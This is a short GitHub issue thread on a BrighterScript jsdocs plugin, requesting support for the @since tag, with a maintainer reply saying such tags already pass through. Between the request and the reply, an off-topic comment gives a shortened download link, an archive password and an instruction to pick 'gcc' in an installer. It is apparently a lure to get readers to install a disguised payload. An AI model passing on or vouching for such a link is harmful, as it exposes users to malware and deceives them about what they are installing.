### ISSUE TITLE
[feature request] Add support for @since

### ISSUE THREAD

**Issue by iObject** [markwpearce/brighterscript-jsdocs-plugin#8]
Please add support for **@since**
https://jsdoc.app/tags-since

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by markwpearce** [comment]
I believe all `@` tags get sent through from brightscript to jsdoc already.
The only exceptions are things like `@param` and `@return` which may be modified based on actual code
